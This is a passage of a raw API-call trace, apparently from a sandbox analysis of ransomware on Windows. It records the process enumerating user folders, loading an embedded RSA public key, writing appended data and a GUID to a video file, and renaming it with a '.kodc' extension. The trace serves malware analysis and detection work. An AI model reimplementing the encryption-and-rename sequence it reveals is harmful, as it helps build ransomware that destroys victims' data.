PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.858] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.858] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.858] PathFindFileNameW (pszPath="") returned="" [0099.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.858] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0099.858] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.859] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.859] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.859] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.859] PathFindFileNameW (pszPath="") returned="" [0099.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.859] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0099.860] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.860] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.860] PathFindFileNameW (pszPath="") returned="" [0099.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0099.861] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0099.861] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.861] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.862] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.862] PathFindFileNameW (pszPath="") returned="" [0099.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0099.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe02d4f50, ftCreationTime.dwHighDateTime=0x1d5be4e, ftLastAccessTime.dwLowDateTime=0x72c8a90, ftLastAccessTime.dwHighDateTime=0x1d5bf0c, ftLastWriteTime.dwLowDateTime=0x72c8a90, ftLastWriteTime.dwHighDateTime=0x1d5bf0c, nFileSizeHigh=0x0, nFileSizeLow=0x8b04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-FqI5Uj8Q.mkv", cAlternateFileName="-FQI5U~1.MKV")) returned 1 [0099.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.862] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-FqI5Uj8Q.mkv") returned=".mkv" [0099.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-FqI5Uj8Q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-fqi5uj8q.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.862] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=35588) returned 1 [0099.863] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.867] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8ade, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.867] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.868] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.868] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x8b04, lpOverlapped=0x0) returned 1 [0099.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.869] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.869] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.869] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.870] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.870] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.870] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.870] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.870] GetLastError () returned 0x0 [0099.870] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.870] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.870] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.870] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.870] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b00) returned 0x9ba6d90 [0099.871] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c028 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.871] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ab8 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7aa0 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.873] GetCurrentThreadId () returned 0x42c [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5f18 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.873] GetCurrentThreadId () returned 0x42c [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.875] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8b04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.875] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.875] CloseHandle (hObject=0x5cc) returned 1 [0099.877] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-FqI5Uj8Q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-fqi5uj8q.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-FqI5Uj8Q.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-fqi5uj8q.mkv.kodc")) returned 1 [0099.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.878] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.879] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532f5b60, ftCreationTime.dwHighDateTime=0x1d5bae4, ftLastAccessTime.dwLowDateTime=0xf4c331a0, ftLastAccessTime.dwHighDateTime=0x1d5b813, ftLastWriteTime.dwLowDateTime=0xf4c331a0, ftLastWriteTime.dwHighDateTime=0x1d5b813, nFileSizeHigh=0x0, nFileSizeLow=0x10184, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0HK4tuqZb.mp4", cAlternateFileName="0HK4TU~1.MP4")) returned 1 [0099.879] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0HK4tuqZb.mp4") returned=".mp4" [0099.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0HK4tuqZb.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0hk4tuqzb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.880] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: 